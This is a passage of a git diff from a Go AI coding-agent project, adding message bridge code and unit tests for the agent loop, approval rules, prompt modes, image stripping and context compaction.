+		QuestionText:    question,
+		QuestionOptions: options,
+		QuestionContext: context,
+	}
+
+	select {
+	case answer := <-responseCh:
+		return answer
+	case <-a.abort:
+		a.questionMu.Lock()
+		delete(a.pendingQuestions, questionID)
+		a.questionMu.Unlock()
+		return ""
+	}
+}
+
+// HandleQuestionResponse processes the user's answer to a question.
+func (a *Agent) HandleQuestionResponse(questionID string, answer string) {
+	a.questionMu.Lock()
+	defer a.questionMu.Unlock()
+
+	if ch, ok := a.pendingQuestions[questionID]; ok {
+		ch <- answer
+		delete(a.pendingQuestions, questionID)
+	}
+}
+
+// AskQuestion implements the tools.QuestionAsker interface.
+// It gets the event channel from the context and delegates to RequestQuestion.
+func (a *Agent) AskQuestion(ctx context.Context, question string, options []string, explanation string) string {
+	eventCh, ok := EventChanFromContext(ctx)
+	if !ok {
+		return ""
+	}
+	return a.RequestQuestion(eventCh, question, options, explanation)
+}
diff --git a/internal/agent/agent_test.go b/internal/agent/agent_test.go
index 9044ca7..632cee4 100644
--- a/internal/agent/agent_test.go
+++ b/internal/agent/agent_test.go
@@ -2,14 +2,62 @@ package agent
 
 import (
 	"context"
+	"encoding/json"
+	"fmt"
 	"testing"
 	"time"
 
+	"github.com/startvibecoding/vibecoding/internal/config"
 	"github.com/startvibecoding/vibecoding/internal/provider"
 	"github.com/startvibecoding/vibecoding/internal/sandbox"
 	"github.com/startvibecoding/vibecoding/internal/tools"
 )
 
+type loopingToolProvider struct {
+	models    []*provider.Model
+	callCount int
+}
+
+func newLoopingToolProvider() *loopingToolProvider {
+	return &loopingToolProvider{
+		models: []*provider.Model{{ID: "model1", Name: "Model 1"}},
+	}
+}
+
+func (p *loopingToolProvider) Chat(ctx context.Context, params provider.ChatParams) <-chan provider.StreamEvent {
+	ch := make(chan provider.StreamEvent, 3)
+	p.callCount++
+	toolCall := &provider.ToolCallBlock{
+		ID:        fmt.Sprintf("call_%d", p.callCount),
+		Name:      "unknown_tool",
+		Arguments: []byte(`{}`),
+	}
+	go func() {
+		defer close(ch)
+		ch <- provider.StreamEvent{Type: provider.StreamStart}
+		ch <- provider.StreamEvent{Type: provider.StreamToolCall, ToolCall: toolCall}
+		ch <- provider.StreamEvent{Type: provider.StreamDone}
+	}()
+	return ch
+}
+
+func (p *loopingToolProvider) Name() string {
+	return "looping"
+}
+
+func (p *loopingToolProvider) Models() []*provider.Model {
+	return p.models
+}
+
+func (p *loopingToolProvider) GetModel(id string) *provider.Model {
+	for _, m := range p.models {
+		if m.ID == id {
+			return m
+		}
+	}
+	return nil
+}
+
 func TestNewAgent(t *testing.T) {
 	mockProvider := provider.NewMockProvider("mock", []*provider.Model{
 		{ID: "model1", Name: "Model 1"},
@@ -303,6 +351,93 @@ func TestAgentRunWithToolCall(t *testing.T) {
 	}
 }
 
+func TestToolOnlyWarningAppendedAfterToolResults(t *testing.T) {
+	mockProvider := newLoopingToolProvider()
+
+	sb := sandbox.NewNoneSandbox()
+	registry := tools.NewRegistry(t.TempDir(), sb)
+
+	var stopped bool
+	cfg := AgentLoopConfig{
+		Config: Config{
+			Provider: mockProvider,
+			Model:    mockProvider.Models()[0],
+			Mode:     "agent",
+		},
+		ToolExecutionMode: "sequential",
+		MaxIterations:     95,
+		ShouldStopAfterTurn: func(ctx ShouldStopAfterTurnContext) bool {
+			for _, msg := range ctx.NewMessages {
+				if msg.Role == "user" && contains(msg.Content, "You have been making tool calls") {
+					stopped = true
+					return true
+				}
+			}
+			return false
+		},
+	}
+
+	a := NewWithLoopConfig(cfg, registry)
+	ch := a.Run(context.Background(), "keep using tools")
+
+	for range ch {
+	}
+
+	if !stopped {
+		t.Fatal("expected warning-triggered stop")
+	}
+
+	messages := a.GetMessages()
+	warningIndex := -1
+	for i, msg := range messages {
+		if msg.Role == "user" && contains(msg.Content, "You have been making tool calls") {
+			warningIndex = i
+			break
+		}
+	}
+	if warningIndex < 2 {
+		t.Fatalf("warning index = %d, want at least 2", warningIndex)
+	}
+	if messages[warningIndex-1].Role != "toolResult" {
+		t.Fatalf("message before warning role = %q, want toolResult", messages[warningIndex-1].Role)
+	}
+	if messages[warningIndex-2].Role != "assistant" {
+		t.Fatalf("message before tool result role = %q, want assistant", messages[warningIndex-2].Role)
+	}
+}
+
+func TestCallbackSnapshotDoesNotExposeInternalSlices(t *testing.T) {
+	mockProvider := newMockProvider()
+	a := New(Config{
+		Provider: mockProvider,
+		Model:    mockProvider.Models()[0],
+		Mode:     "agent",
+	}, tools.NewRegistry(t.TempDir(), sandbox.NewNoneSandbox()))
+
+	a.messages = []provider.Message{
+		provider.NewAssistantMessage([]provider.ContentBlock{{
+			Type: "toolCall",
+			ToolCall: &provider.ToolCallBlock{
+				ID:        "call-1",
+				Name:      "read",
+				Arguments: json.RawMessage(`{"path":"a"}`),
+			},
+		}}),
+	}
+	a.context.Messages = a.messages
+
+	messages, ctx := a.callbackSnapshot()
+	messages[0].Contents[0].ToolCall.Name = "mutated"
+	ctx.Messages[0].Contents[0].ToolCall.Arguments[0] = '{'
+
+	if a.messages[0].Contents[0].ToolCall.Name != "read" {
+		t.Fatalf("internal tool name mutated: %s", a.messages[0].Contents[0].ToolCall.Name)
+	}
+	if string(a.context.Messages[0].Contents[0].ToolCall.Arguments) != `{"path":"a"}` {
+		t.Fatalf("internal arguments mutated: %s", string(a.context.Messages[0].Contents[0].ToolCall.Arguments))
+	}
+}
+
 func TestAgentRunSequential(t *testing.T) {
 	toolCall1 := &provider.ToolCallBlock{
 		ID:        "call_1",
@@ -367,6 +502,63 @@ func TestAgentRunSequential(t *testing.T) {
 	}
 }
 
+func TestWebSearchToolDefinitionCarriesModelMetadata(t *testing.T) {
+	settings := &config.Settings{
+		WebSearch: config.WebSearchSettings{
+			Enabled:      config.BoolPtr(true),
+			Provider:     "anthropic",
+			ProviderType: "messages",
+			Model:        "claude-sonnet-4-20250514",
+		},
+	}
+	def, ok := webSearchToolDefinition(settings)
+	if !ok {
+		t.Fatal("expected web search tool definition")
+	}
+	if def.Name != "web_search" {
+		t.Fatalf("name = %q, want web_search", def.Name)
+	}
+	if def.Provider != "anthropic" {
+		t.Fatalf("provider = %q, want anthropic", def.Provider)
+	}
+	if def.ProviderType != "messages" {
+		t.Fatalf("providerType = %q, want messages", def.ProviderType)
+	}
+	if def.Model != "claude-sonnet-4-20250514" {
+		t.Fatalf("model = %q, want claude-sonnet-4-20250514", def.Model)
+	}
+}
+
+func TestWebSearchToolDefinitionResolvesProviderReference(t *testing.T) {
+	settings := &config.Settings{
+		DefaultProvider: "gpt",
+		WebSearch: config.WebSearchSettings{
+			Enabled:      config.BoolPtr(true),
+			Provider:     "gpt",
+			ProviderType: "responses",
+		},
+		Providers: map[string]*config.ProviderConfig{
+			"gpt": {
+				BaseURL: "https://co.yes.vg/v1",
+				API:     "openai-responses",
+			},
+		},
+	}
+	def, ok := webSearchToolDefinition(settings)
+	if !ok {
+		t.Fatal("expected web search tool definition")
+	}
+	if def.Provider != "gpt" {
+		t.Fatalf("provider = %q, want gpt", def.Provider)
+	}
+	if def.ProviderType != "responses" {
+		t.Fatalf("providerType = %q, want responses", def.ProviderType)
+	}
+	if def.Provider == "" {
+		t.Fatal("expected hosted provider to be resolved")
+	}
+}
+
 func TestBuildSystemPrompt(t *testing.T) {
 	toolNames := []string{"read", "write", "bash"}
 	cwd := "/home/user/project"
@@ -378,7 +570,7 @@ func TestBuildSystemPrompt(t *testing.T) {
 	}
 	toolGuidelines := []string{"Use read to examine files instead of cat or sed."}
 
-	prompt := BuildSystemPrompt("agent", toolNames, cwd, extraContext, toolSnippets, toolGuidelines)
+	prompt := BuildSystemPrompt("agent", toolNames, cwd, extraContext, toolSnippets, toolGuidelines, false)
 
 	if prompt == "" {
 		t.Fatal("expected non-empty prompt")
@@ -404,7 +596,7 @@ func TestBuildSystemPrompt(t *testing.T) {
 
 func TestBuildSystemPromptModes(t *testing.T) {
 	// Test plan mode
-	planPrompt := BuildSystemPrompt("plan", nil, "/tmp", "", nil, nil)
+	planPrompt := BuildSystemPrompt("plan", nil, "/tmp", "", nil, nil, false)
 	if !contains(planPrompt, "PLAN") {
 		t.Error("expected plan prompt to contain 'PLAN'")
 	}
@@ -414,24 +606,100 @@ func TestBuildSystemPromptModes(t *testing.T) {
 	}
 
 	// Test agent mode
-	agentPrompt := BuildSystemPrompt("agent", nil, "/tmp", "", nil, nil)
+	agentPrompt := BuildSystemPrompt("agent", nil, "/tmp", "", nil, nil, false)
 	if !contains(agentPrompt, "AGENT") {
 		t.Error("expected agent prompt to contain 'AGENT'")
 	}
 
 	// Test yolo mode
-	yoloPrompt := BuildSystemPrompt("yolo", nil, "/tmp", "", nil, nil)
+	yoloPrompt := BuildSystemPrompt("yolo", nil, "/tmp", "", nil, nil, false)
 	if !contains(yoloPrompt, "YOLO") {
 		t.Error("expected yolo prompt to contain 'YOLO'")
 	}
 
 	// Test unknown mode
-	unknownPrompt := BuildSystemPrompt("custom", nil, "/tmp", "", nil, nil)
+	unknownPrompt := BuildSystemPrompt("custom", nil, "/tmp", "", nil, nil, false)
 	if !contains(unknownPrompt, "CUSTOM") {
 		t.Error("expected unknown prompt to contain mode name")
 	}
 }
 
+func TestBuildSystemPromptMultiAgentGated(t *testing.T) {
+	defaultPrompt := BuildSystemPrompt("agent", nil, "/tmp", "", nil, nil, false)
+	if contains(defaultPrompt, "Sub-Agent Tools") {
+		t.Error("expected default prompt to omit sub-agent instructions")
+	}
+
+	multiPrompt := BuildSystemPrompt("agent", []string{"subagent_spawn"}, "/tmp", "", nil, nil, true)
+	if !contains(multiPrompt, "Sub-Agent Tools") {
+		t.Error("expected multi-agent prompt to include sub-agent instructions")
+	}
+	if !contains(multiPrompt, "Act as the orchestrator") {
+		t.Error("expected multi-agent prompt to include orchestration guidance")
+	}
+}
+
+// --- stripImageContent tests ---
+
+func TestStripImageContent(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Content: "hello"},
+		{Role: "toolResult", ToolName: "read", Contents: []provider.ContentBlock{
+			{Type: "text", Text: "[Image file: test.png]"},
+			{Type: "image", Image: &provider.ImageContent{MimeType: "image/png", Data: "base64data"}},
+		}},
+		{Role: "assistant", Contents: []provider.ContentBlock{
+			{Type: "text", Text: "I see the image"},
+		}},
+	}
+
+	result := stripImageContent(messages)
+	if len(result) != 3 {
+		t.Fatalf("expected 3 messages, got %d", len(result))
+	}
+
+	// Second message should have image stripped
+	if len(result[1].Contents) != 1 {
+		t.Errorf("expected 1 content block after stripping, got %d", len(result[1].Contents))
+	}
+	if result[1].Contents[0].Type == "image" {
+		t.Error("image content should have been stripped")
+	}
+}
+
+func TestStripImageContentOnlyImage(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Content: "hello"},
+		{Role: "toolResult", ToolName: "read", Contents: []provider.ContentBlock{
+			{Type: "image", Image: &provider.ImageContent{MimeType: "image/png", Data: "base64data"}},
+		}},
+	}
+
+	result := stripImageContent(messages)
+	// Message with only image and no text should be skipped
+	if len(result) != 1 {
+		t.Fatalf("expected 1 message (image-only skipped), got %d", len(result))
+	}
+}
+
+func TestSupportsImages(t *testing.T) {
+	a := &Agent{config: AgentLoopConfig{}}
+	a.config.Model = &provider.Model{Input: []string{"text"}}
+	if a.supportsImages() {
+		t.Error("expected false for text-only model")
+	}
+
+	a.config.Model = &provider.Model{Input: []string{"text", "image"}}
+	if !a.supportsImages() {
+		t.Error("expected true for text+image model")
+	}
+
+	a.config.Model = nil
+	if a.supportsImages() {
+		t.Error("expected false for nil model")
+	}
+}
+
 func TestFormatToolListWithSnippets(t *testing.T) {
 	// Test with tools and snippets
 	tools := []string{"read", "write", "bash"}
@@ -528,6 +796,142 @@ func TestBaseProvider(t *testing.T) {
 	}
 }
 
+// --- ContextWithAgentID tests ---
+
+func TestContextWithAgentID(t *testing.T) {
+	ctx := context.Background()
+	ctx = ContextWithAgentID(ctx, "test-agent")
+
+	id, ok := AgentIDFromContext(ctx)
+	if !ok {
+		t.Fatal("expected agent ID in context")
+	}
+	if id != "test-agent" {
+		t.Errorf("agent ID = %q, want 'test-agent'", id)
+	}
+
+	// Missing from context
+	_, ok = AgentIDFromContext(context.Background())
+	if ok {
+		t.Error("expected no agent ID in empty context")
+	}
+}
+
+func TestContextWithEventChan(t *testing.T) {
+	ch := make(chan Event, 1)
+	ctx := ContextWithEventChan(context.Background(), ch)
+
+	got, ok := EventChanFromContext(ctx)
+	if !ok {
+		t.Fatal("expected event chan in context")
+	}
+	if got == nil {
+		t.Fatal("expected non-nil event chan")
+	}
+
+	_, ok = EventChanFromContext(context.Background())
+	if ok {
+		t.Error("expected no event chan in empty context")
+	}
+}
+
+func TestContextWithParentRunContext(t *testing.T) {
+	parent := context.Background()
+	ctx := ContextWithParentRunContext(context.Background(), parent)
+
+	got, ok := ParentRunContextFromContext(ctx)
+	if !ok {
+		t.Fatal("expected parent run context")
+	}
+	if got != parent {
+		t.Fatal("unexpected parent run context")
+	}
+
+	_, ok = ParentRunContextFromContext(context.Background())
+	if ok {
+		t.Error("expected no parent run context in empty context")
+	}
+}
+
+// --- Manager status tests ---
+
+func TestAgentManagerMarkRunning(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	m.Create(AgentOptions{ID: "a1"})
+	m.MarkRunning("a1")
+	st, ok := m.Status("a1")
+	if !ok {
+		t.Fatal("expected status")
+	}
+	if st.State != "running" {
+		t.Errorf("state = %q, want running", st.State)
+	}
+}
+
+func TestAgentManagerMarkDone(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	m.Create(AgentOptions{ID: "a1"})
+	m.MarkDone("a1", "completed")
+	st, _ := m.Status("a1")
+	if st.State != "done" {
+		t.Errorf("state = %q, want done", st.State)
+	}
+	if st.Result != "completed" {
+		t.Errorf("result = %q, want completed", st.Result)
+	}
+}
+
+func TestAgentManagerMarkError(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	m.Create(AgentOptions{ID: "a1"})
+	m.MarkError("a1", fmt.Errorf("test error"))
+	st, _ := m.Status("a1")
+	if st.State != "error" {
+		t.Errorf("state = %q, want error", st.State)
+	}
+	if st.Error != "test error" {
+		t.Errorf("error = %q, want 'test error'", st.Error)
+	}
+}
+
+func TestAgentManagerMarkErrorNil(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	m.Create(AgentOptions{ID: "a1"})
+	m.MarkError("a1", nil)
+	st, _ := m.Status("a1")
+	if st.Error != "" {
+		t.Errorf("error = %q, want empty", st.Error)
+	}
+}
+
+func TestAgentManagerRegister(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	// Create an agent through factory to get a valid agentpkg.Agent
+	a, _ := m.Create(AgentOptions{ID: "parent"})
+	m.Destroy("parent")
+	// Re-register
+	m.Register(a)
+	if m.Count() != 1 {
+		t.Errorf("count = %d, want 1", m.Count())
+	}
+}
+
+func TestAgentManagerRegisterNil(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	m.Register(nil) // Should not panic
+	if m.Count() != 0 {
+		t.Errorf("count = %d, want 0", m.Count())
+	}
+}
+
+func TestAgentManagerStatusNotFound(t *testing.T) {
+	m := NewAgentManager(&AgentFactory{})
+	_, ok := m.Status("nonexistent")
+	if ok {
+		t.Error("expected not found")
+	}
+}
+
 func contains(s, substr string) bool {
 	return len(s) >= len(substr) && (s == substr || len(s) > 0 && containsSubstring(s, substr))
 }
@@ -540,3 +944,136 @@ func containsSubstring(s, substr string) bool {
 	}
 	return false
 }
+
+// --- ForceCompact tests ---
+
+func TestSetForceCompact_ShouldCompactReturnsTrue(t *testing.T) {
+	mockProvider := provider.NewMockProvider("mock", []*provider.Model{
+		{ID: "model1", Name: "Model 1", ContextWindow: 100000},
+	}, nil)
+
+	sb := sandbox.NewNoneSandbox()
+	registry := tools.NewRegistry(t.TempDir(), sb)
+
+	cfg := Config{
+		Provider: mockProvider,
+		Model:    mockProvider.Models()[0],
+		Mode:     "agent",
+	}
+
+	a := New(cfg, registry)
+
+	// Load some messages so there's something to compact
+	a.LoadHistoryMessages([]provider.Message{
+		provider.NewUserMessage("Hello"),
+		provider.NewAssistantMessage([]provider.ContentBlock{{Type: "text", Text: "Hi there"}}),
+	})
+
+	// Without force, ShouldCompact should be false (context is tiny)
+	if a.ShouldCompact() {
+		t.Fatal("ShouldCompact should be false without force and small context")
+	}
+
+	// Set force flag
+	a.SetForceCompact()
+
+	// Now ShouldCompact should return true (force flag set)
+	if !a.ShouldCompact() {
+		t.Fatal("ShouldCompact should be true after SetForceCompact")
+	}
+
+	// Force flag is consumed — second call should return false
+	if a.ShouldCompact() {
+		t.Fatal("ShouldCompact should be false after force flag was consumed")
+	}
+}
+
+func TestSetForceCompact_NoMessagesDoesNotForce(t *testing.T) {
+	mockProvider := provider.NewMockProvider("mock", []*provider.Model{
+		{ID: "model1", Name: "Model 1", ContextWindow: 100000},
+	}, nil)
+
+	sb := sandbox.NewNoneSandbox()
+	registry := tools.NewRegistry(t.TempDir(), sb)
+
+	cfg := Config{
+		Provider: mockProvider,
+		Model:    mockProvider.Models()[0],
+		Mode:     "agent",
+	}
+
+	a := New(cfg, registry)
+
+	// No messages loaded — force should not trigger (nothing to compact)
+	a.SetForceCompact()
+	if a.ShouldCompact() {
+		t.Fatal("ShouldCompact should be false with force but no messages")
+	}
+}
+
+func TestSetForceCompact_NoModelDoesNotForce(t *testing.T) {
+	mockProvider := provider.NewMockProvider("mock", []*provider.Model{
+		{ID: "model1", Name: "Model 1"},
+	}, nil)
+
+	sb := sandbox.NewNoneSandbox()
+	registry := tools.NewRegistry(t.TempDir(), sb)
+
+	cfg := Config{
+		Provider: mockProvider,
+		Model:    nil, // no model
+		Mode:     "agent",
+	}
+
+	a := New(cfg, registry)
+	a.LoadHistoryMessages([]provider.Message{
+		provider.NewUserMessage("Hello"),
+		provider.NewAssistantMessage([]provider.ContentBlock{{Type: "text", Text: "Hi"}}),
+	})
+
+	a.SetForceCompact()
+	if a.ShouldCompact() {
+		t.Fatal("ShouldCompact should be false with force but no model")
+	}
+}
+
+// --- MaxConsecutiveNoText tests ---
+
+func TestMaxConsecutiveNoText_Default(t *testing.T) {
+	mockProvider := provider.NewMockProvider("mock", []*provider.Model{{ID: "m1", Name: "M1"}}, nil)
+	sb := sandbox.NewNoneSandbox()
+	registry := tools.NewRegistry(t.TempDir(), sb)
+
+	a := NewWithLoopConfig(AgentLoopConfig{
+		Config: Config{
+			Provider: mockProvider,
+			Model:    mockProvider.Models()[0],
+			Mode:     "agent",
+		},
+	}, registry)
+
+	// Default MaxConsecutiveNoText should be 200 (MaxIterations default)
+	// but the threshold is 95. Verify the config field is 0 (uses default).
+	if a.config.MaxConsecutiveNoText != 0 {
+		t.Fatalf("expected default MaxConsecutiveNoText=0, got %d", a.config.MaxConsecutiveNoText)
+	}
+}
+
+func TestMaxConsecutiveNoText_Custom(t *testing.T) {
+	mockProvider := provider.NewMockProvider("mock", []*provider.Model{{ID: "m1", Name: "M1"}}, nil)
+	sb := sandbox.NewNoneSandbox()
+	registry := tools.NewRegistry(t.TempDir(), sb)
+
+	a := NewWithLoopConfig(AgentLoopConfig{
+		Config: Config{
+			Provider: mockProvider,
+			Model:    mockProvider.Models()[0],
+			Mode:     "agent",
+		},
+		MaxConsecutiveNoText: 10,
+	}, registry)
+
+	if a.config.MaxConsecutiveNoText != 10 {
+		t.Fatalf("expected MaxConsecutiveNoText=10, got %d", a.config.MaxConsecutiveNoText)
+	}
+}
diff --git a/internal/agent/approval_test.go b/internal/agent/approval_test.go
index a913970..5a0c0c5 100644
--- a/internal/agent/approval_test.go
+++ b/internal/agent/approval_test.go
@@ -30,6 +30,25 @@ func TestNeedsApproval_NonBashNeverNeedsApproval(t *testing.T) {
 	}
 }
 
+func TestNeedsApproval_AgentModeWriteConfirm(t *testing.T) {
+	confirm := true
+	a := newApprovalTestAgent(t, "agent", config.ApprovalSettings{ConfirmBeforeWrite: &confirm})
+	if !a.NeedsApproval("write", map[string]any{"path": "README.md"}) {
+		t.Fatal("write should require approval when confirmBeforeWrite is enabled")
+	}
+	if !a.NeedsApproval("edit", map[string]any{"path": "README.md"}) {
+		t.Fatal("edit should require approval when confirmBeforeWrite is enabled")
+	}
+}
+
+func TestNeedsApproval_YoloModeWriteDoesNotConfirm(t *testing.T) {
+	confirm := true
+	a := newApprovalTestAgent(t, "yolo", config.ApprovalSettings{ConfirmBeforeWrite: &confirm})
+	if a.NeedsApproval("write", map[string]any{"path": "README.md"}) {
+		t.Fatal("write should not require approval in yolo mode")
+	}
+}
+
 func TestNeedsApproval_AgentModeWhitelistSkipsApproval(t *testing.T) {
 	a := newApprovalTestAgent(t, "agent", config.ApprovalSettings{
 		BashWhitelist: []string{"go ", "make "},
diff --git a/internal/agent/bridge.go b/internal/agent/bridge.go
new file mode 100644
index 0000000..48023c0
--- /dev/null
+++ b/internal/agent/bridge.go
@@ -0,0 +1,376 @@
+package agent
+
+import (
+	"context"
+
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
+	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+)
+
+// --- Type conversion helpers ---
+
+// MessageToPublic converts an internal provider.Message to a public agent.Message.
+func MessageToPublic(m provider.Message) agentpkg.Message {
+	msg := agentpkg.Message{
+		Role:           agentpkg.Role(m.Role),
+		Content:        m.Content,
+		IsError:        m.IsError,
+		SystemInjected: m.SystemInjected,
+		ToolCallID:     m.ToolCallID,
+		ToolName:       m.ToolName,
+	}
+	if m.Usage != nil {
+		msg.Usage = &agentpkg.Usage{
+			InputTokens:  m.Usage.Input,
+			OutputTokens: m.Usage.Output,
+			CacheRead:    m.Usage.CacheRead,
+			CacheWrite:   m.Usage.CacheWrite,
+			TotalTokens:  m.Usage.TotalTokens,
+		}
+	}
+	for _, cb := range m.Contents {
+		msg.Contents = append(msg.Contents, ContentBlockToPublic(cb))
+	}
+	return msg
+}
+
+// MessageFromPublic converts a public agent.Message to an internal provider.Message.
+func MessageFromPublic(m agentpkg.Message) provider.Message {
+	msg := provider.Message{
+		Role:           string(m.Role),
+		Content:        m.Content,
+		IsError:        m.IsError,
+		SystemInjected: m.SystemInjected,
+		ToolCallID:     m.ToolCallID,
+		ToolName:       m.ToolName,
+	}
+	if m.Usage != nil {
+		msg.Usage = &provider.Usage{
+			Input:       m.Usage.InputTokens,
+			Output:      m.Usage.OutputTokens,
+			CacheRead:   m.Usage.CacheRead,
+			CacheWrite:  m.Usage.CacheWrite,
+			TotalTokens: m.Usage.TotalTokens,
+		}
+	}
+	for _, cb := range m.Contents {
+		msg.Contents = append(msg.Contents, ContentBlockFromPublic(cb))
+	}
+	return msg
+}
+
+// ContentBlockToPublic converts an internal provider.ContentBlock to public.
+func ContentBlockToPublic(cb provider.ContentBlock) agentpkg.ContentBlock {
+	pub := agentpkg.ContentBlock{
+		Type:      cb.Type,
+		Text:      cb.Text,
+		Thinking:  cb.Thinking,
+		Signature: cb.Signature,
+	}
+	if cb.ToolCall != nil {
+		pub.ToolCall = &agentpkg.ToolCallBlock{
+			ID:        cb.ToolCall.ID,
+			Name:      cb.ToolCall.Name,
+			Arguments: cb.ToolCall.Arguments,
+		}
+	}
+	if cb.Image != nil {
+		pub.Image = &agentpkg.ImageContent{
+			MimeType: cb.Image.MimeType,
+			Data:     cb.Image.Data,
+		}
+	}
+	if cb.CacheControl != nil {
+		pub.CacheControl = &agentpkg.CacheControl{Type: cb.CacheControl.Type}
+	}
+	return pub
+}
+
+// ContentBlockFromPublic converts a public agent.ContentBlock to internal.
+func ContentBlockFromPublic(cb agentpkg.ContentBlock) provider.ContentBlock {
+	internal := provider.ContentBlock{
+		Type:      cb.Type,
+		Text:      cb.Text,
+		Thinking:  cb.Thinking,
+		Signature: cb.Signature,
+	}
+	if cb.ToolCall != nil {
+		internal.ToolCall = &provider.ToolCallBlock{
+			ID:        cb.ToolCall.ID,
+			Name:      cb.ToolCall.Name,
+			Arguments: cb.ToolCall.Arguments,
+		}
+	}
+	if cb.Image != nil {
+		internal.Image = &provider.ImageContent{
+			MimeType: cb.Image.MimeType,
+			Data:     cb.Image.Data,
+		}
+	}
+	if cb.CacheControl != nil {
+		internal.CacheControl = &provider.CacheControl{Type: cb.CacheControl.Type}
+	}
+	return internal
+}
+
+// MessagesToPublic converts a slice of internal messages to public.
+func MessagesToPublic(msgs []provider.Message) []agentpkg.Message {
+	result := make([]agentpkg.Message, len(msgs))
+	for i, m := range msgs {
+		result[i] = MessageToPublic(m)
+	}
+	return result
+}
+
+// MessagesFromPublic converts a slice of public messages to internal.
+func MessagesFromPublic(msgs []agentpkg.Message) []provider.Message {
+	result := make([]provider.Message, len(msgs))
+	for i, m := range msgs {
+		result[i] = MessageFromPublic(m)
+	}
+	return result
+}
+
+// ContextUsageToPublic converts internal context usage to public.
+func ContextUsageToPublic(u *ctxpkg.ContextUsage) *agentpkg.ContextUsage {
+	if u == nil {
+		return nil
+	}
+	return &agentpkg.ContextUsage{
+		Tokens:        u.Tokens,
+		ContextWindow: u.ContextWindow,
+		Percent:       u.Percent,
+	}
+}
+
+// EventToPublic converts an internal Event to a public agent.Event.
+func EventToPublic(e Event) agentpkg.Event {
+	return agentpkg.Event{
+		AgentID:         agentpkg.AgentID(e.AgentID),
+		Type:            agentpkg.EventType(e.Type),
+		TextDelta:       e.TextDelta,
+		ThinkDelta:      e.ThinkDelta,
+		ToolCallID:      e.ToolCallID,
+		ToolName:        e.ToolName,
+		ToolArgs:        e.ToolArgs,
+		ToolResult:      e.ToolResult,
+		StatusMessage:   e.StatusMessage,
+		Done:            e.Done,
+		StopReason:      e.StopReason,
+		Error:           e.Error,
+		ApprovalID:      e.ApprovalID,
+		ApprovalTool:    e.ApprovalTool,
+		ApprovalArgs:    e.ApprovalArgs,
+		ApprovalResult:  e.ApprovalResult,
+		QuestionID:      e.QuestionID,
+		QuestionText:    e.QuestionText,
+		QuestionOptions: e.QuestionOptions,
+		QuestionContext: e.QuestionContext,
+		QuestionAnswer:  e.QuestionAnswer,
+	}
+}
+
+// WrapEventChan wraps an internal event channel into a public event channel.
+func WrapEventChan(in <-chan Event) <-chan agentpkg.Event {
+	out := make(chan agentpkg.Event, 100)
+	go func() {
+		defer close(out)
+		for e := range in {
+			out <- EventToPublic(e)
+		}
+	}()
+	return out
+}
+
+// --- ProviderAdapter wraps a public agent.Provider to satisfy internal provider.Provider ---
+
+// ProviderAdapter wraps a public agent.Provider to satisfy the internal provider.Provider interface.
+// This enables the public Builder to supply an external Provider implementation.
+type ProviderAdapter struct {
+	provider.BaseProvider
+	pub agentpkg.Provider
+}
+
+// NewProviderAdapter creates an internal Provider from a public one.
+func NewProviderAdapter(pub agentpkg.Provider) *ProviderAdapter {
+	pubModels := pub.Models()
+	models := make([]*provider.Model, len(pubModels))
+	for i, m := range pubModels {
+		models[i] = ModelInfoToInternal(m)
+	}
+	return &ProviderAdapter{
+		BaseProvider: provider.NewBaseProvider(pub.Name(), models),
+		pub:          pub,
+	}
+}
+
+// Chat delegates to the public provider, converting between public and internal types.
+func (pa *ProviderAdapter) Chat(ctx context.Context, params provider.ChatParams) <-chan provider.StreamEvent {
+	pubParams := ChatParamsToPublic(params)
+	pubCh := pa.pub.Chat(ctx, pubParams)
+
+	ch := make(chan provider.StreamEvent, 100)
+	go func() {
+		defer close(ch)
+		for e := range pubCh {
+			ch <- StreamEventFromPublic(e)
+		}
+	}()
+	return ch
+}
+
+// ModelInfoToInternal converts a public ModelInfo to an internal *Model.
+func ModelInfoToInternal(m agentpkg.ModelInfo) *provider.Model {
+	model := &provider.Model{
+		ID:            m.ID,
+		Name:          m.Name,
+		Provider:      m.Provider,
+		Reasoning:     m.Reasoning,
+		Input:         m.Input,
+		ContextWindow: m.ContextWindow,
+		MaxTokens:     m.MaxTokens,
+	}
+	if m.Compat != nil {
+		model.Compat = &provider.ModelCompat{
+			ThinkingFormat:                      m.Compat.ThinkingFormat,
+			RequiresReasoningContentOnAssistant: m.Compat.RequiresReasoningContentOnAssistant,
+			ForceAdaptiveThinking:               m.Compat.ForceAdaptiveThinking,
+			SupportsDeveloperRole:               m.Compat.SupportsDeveloperRole,
+			SupportsStore:                       m.Compat.SupportsStore,
+			SupportsReasoningEffort:             m.Compat.SupportsReasoningEffort,
+			SupportsStrictMode:                  m.Compat.SupportsStrictMode,
+			MaxTokensField:                      m.Compat.MaxTokensField,
+			SupportsCacheControlOnTools:         m.Compat.SupportsCacheControlOnTools,
+			SupportsLongCacheRetention:          m.Compat.SupportsLongCacheRetention,
+			SendSessionAffinityHeaders:          m.Compat.SendSessionAffinityHeaders,
+			SupportsEagerToolInputStreaming:     m.Compat.SupportsEagerToolInputStreaming,
+		}
+	}
+	return model
+}
+
+// ChatParamsToPublic converts internal ChatParams to public.
+func ChatParamsToPublic(p provider.ChatParams) agentpkg.ChatParams {
+	msgs := make([]agentpkg.Message, len(p.Messages))
+	for i, m := range p.Messages {
+		msgs[i] = MessageToPublic(m)
+	}
+	tools := make([]agentpkg.ToolDefinition, len(p.Tools))
+	for i, t := range p.Tools {
+		tools[i] = agentpkg.ToolDefinition{
+			Name:         t.Name,
+			Description:  t.Description,
+			Parameters:   t.Parameters,
+			Kind:         t.Kind,
+			Provider:     t.Provider,
+			ProviderType: t.ProviderType,
+			Model:        t.Model,
+		}
+	}
+	var abort chan struct{}
+	if p.Abort != nil {
+		// The internal type is <-chan struct{}, but the public type is chan struct{}.
+		// We create a bridging channel.
+		abort = make(chan struct{})
+		go func() {
+			<-p.Abort
+			close(abort)
+		}()
+	}
+	return agentpkg.ChatParams{
+		Messages:      msgs,
+		Tools:         tools,
+		SystemPrompt:  p.SystemPrompt,
